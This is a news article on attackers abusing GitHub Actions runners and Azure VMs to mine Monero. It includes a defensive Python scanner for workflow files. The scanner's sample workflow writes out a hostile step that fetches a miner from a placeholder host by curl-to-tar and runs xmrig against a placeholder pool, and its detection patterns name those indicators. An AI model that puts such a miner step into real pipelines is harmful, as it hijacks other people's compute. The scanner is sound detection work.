GitHub Actions and Azure virtual machines (VMs) are being used for cloud-based cryptocurrency mining, indicating ongoing efforts by malicious actors to target cloud resources for illicit purposes.
“Attackers can abuse the operators or servers provided by GitHub to run an organization’s pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to easily earn profit,” Trend Micro researcher Magno Logan said in a report last week.
GitHub Actions (GHAs) is a continuous integration and continuous delivery (CI/CD) platform that allows users to automate the building, testing, and deployment of software. Developers can use the feature to create workflows that build and test each pull request in a code repository, or deploy merged pull requests to production.
Both the Linux and Windows hosted runners run on Standard_DS2_v2 virtual machines in Azure, each with two vCPUs and 7 GB of memory.
The Japanese company said it identified no fewer than 1,000 repositories and over 550 code samples that take advantage of the platform to mine cryptocurrency using the runners provided by GitHub. The Microsoft-owned code hosting service has been notified of the issue.
Additionally, 11 repositories were found to hold similar variants of a YAML script containing commands to mine Monero coins, all of which were backed by the same wallet, suggesting it is the handiwork of a single actor or a group working together.
“As long as malicious actors only use their own accounts and repositories, end users should have no reason to worry,” Logan said. “Problems arise when these GHAs are shared on the GitHub Marketplace or used as a dependency for other Actions.”
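The two risks described above (workflow YAML that downloads and launches a miner, and third-party Actions pulled in as dependencies) can be screened for before a workflow is merged. The scanner below is an added example written for this page, not code from Trend Micro or GitHub; the sample workflow, the hostnames (`*.example.invalid`), and the 40-character commit SHA in it are constructed placeholders. It flags `uses:` references that are not pinned to a full commit SHA (a mutable tag or branch can be repointed at a malicious version later) and `run` lines containing common miner indicators.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample workflow (not from any real repository). It contains one
# unpinned third-party action and a setup step that fetches and starts a
# miner; hostnames and the checkout SHA are placeholders.
SAMPLE_WORKFLOW = """\
name: build
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: some-org/helper-action@main
      - name: Run tests
        run: make test
      - name: Setup
        run: |
          curl -sL https://miner.example.invalid/xmrig.tar.gz | tar xz
          ./xmrig -o stratum+tcp://pool.example.invalid:3333 --donate-level 0
"""

FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
# "- uses: owner/repo@ref" (local "./path" and "docker://" references are skipped)
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w./-]+)@(\S+)")
# Heuristic indicators of cryptomining in shell steps.
SUSPICIOUS = [
    (re.compile(r"\bxmrig\b", re.I), "known miner binary name"),
    (re.compile(r"stratum\+(tcp|ssl)://", re.I), "mining pool URL scheme"),
    (re.compile(r"--donate-level", re.I), "miner-specific command-line flag"),
    (re.compile(r"(curl|wget)[^\n|]*\|\s*(sh|bash|tar)\b", re.I),
     "download piped straight into a shell or extractor"),
]


@dataclass
class Finding:
    line: int      # 1-based line number in the workflow file
    kind: str      # "unpinned-action" or "miner-indicator"
    detail: str


def scan_workflow(text: str) -> List[Finding]:
    """Return findings for one workflow file's text, in line order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # YAML comment
        m = USES_RE.match(line)
        if m:
            action, ref = m.groups()
            if not FULL_SHA.match(ref):
                findings.append(Finding(
                    lineno, "unpinned-action",
                    f"{action} pinned to mutable ref '{ref}'; pin to a full commit SHA"))
            continue  # a uses: line carries no shell
        for pattern, why in SUSPICIOUS:
            if pattern.search(line):
                findings.append(Finding(lineno, "miner-indicator", why))
    return findings


if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {f.line}: [{f.kind}] {f.detail}")
```

Run it against every file under `.github/workflows/` in a pre-merge check; the indicator list is deliberately short and should be extended with whatever your own telemetry shows, while the SHA-pinning rule applies to every `uses:` reference regardless of owner.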
Cryptojacking-oriented groups are known to penetrate cloud deployments by exploiting a security flaw within the target systems, such as an unpatched vulnerability, weak credentials, or a misconfigured cloud implementation.
Some of the prominent players in the illicit cryptocurrency mining landscape include 8220, Keksec (aka Kek Security), Kinsing, Outlaw, and TeamTNT.
The malware toolsets are also characterized by the use of kill scripts that terminate and wipe out competing cryptocurrency miners, so that the attackers can claim the cloud system’s resources for themselves, in what Trend Micro calls a battle “fought for control of resources of the victim”.
That said, cryptominer deployments, beyond the infrastructure and energy costs they impose, are also a barometer of poor security hygiene, since the same initial access gained through cloud misconfiguration can be weaponized by threat actors for far more damaging purposes, such as data exfiltration or ransomware.
“A unique aspect […] is that groups of malicious actors not only have to deal with a target organization’s security systems and staff, but they also have to compete with each other for limited resources,” the company noted in a previous report.
“The battle to gain and maintain control over victim servers is a major driving force for the evolution of these groups’ tools and techniques, driving them to continually improve their ability to remove competitors from compromised systems and, at the same time, to resist their own removal.”